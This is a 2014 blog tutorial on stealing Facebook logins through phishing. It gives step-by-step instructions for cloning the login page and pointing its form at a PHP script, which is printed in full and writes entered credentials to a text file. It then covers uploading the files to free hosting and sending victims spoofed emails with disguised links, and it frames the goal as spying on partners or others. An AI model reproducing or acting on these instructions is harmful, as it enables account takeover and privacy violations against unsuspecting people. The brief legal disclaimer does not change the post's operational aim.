Thursday, 13 November 2014

Facebook phishing

Hack facebook account with phishing
Many of the people want to learn how to hack a facebook account due to various reasons. Some may want to know about what their partners are doing on facebook behind them or one may want to know what is going on in someone’s life.
Note: Well, as it is illegal, so I will not be responsible if you got into trouble with your friend
or anyone else. I too only applied this on my own facebook id because am not in favor to read someone’s privacy.
What is Facebook phishing?
Phishing is a technique in which we make a fake webpage that looks almost same as the original webpage of any particular official site.
Hence In facebook phishing process, we will create a fake facebook webpage that looks exactly like the original one. And when the users enter their email id and password, it will be stored in your dashboard.
So let’s start.
Step 1
Open the Facebook login page in browser. Right click on the blank space of the page and click on 
“View page source”. Select all text (ctrl+a) and copy (ctrl+c) to the Notepad.

Step 2
Now in Notepad press Ctrl + f and search for
“action=” . See the figure below-

Now replace the code action="” with action=”next.php” ‘.
Now again search for method=”post” and replace it with method=”get”.
Save this notepad file as index.html 

Now we need other file to store passwords.

Step 3
Open the notepad and type the following code:
 <?php header("Location: "); $handle = fopen("paswrds.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>

Save the file as next.php.

Step 4
Again open the Notepad and save empty page as “paswrds.txt” 

Now  we would have 3 files i.e. index.html, next.php and paswrds.text.

Step 5
What you have to do is upload these files on any of free web hosting platform.
Google it on how to upload files on free webhosting service using Filezilla?
One website you can use for this purpose

There are many other sites you can find on google.

Step 6
Now create a fake email account with fake facebook keywords such that it looks like an original facebook email..

Send it to a user. In this email, prepare a hyper link that will look like facebook link but it will redirect the user to your fake phishing page. See the figure below

So whenever someone will click on this link, it will open the fake facebook page prompting the user to input his/her email and password. Once done, this information will be sent to your web hosting account and you will get the account information of the user.

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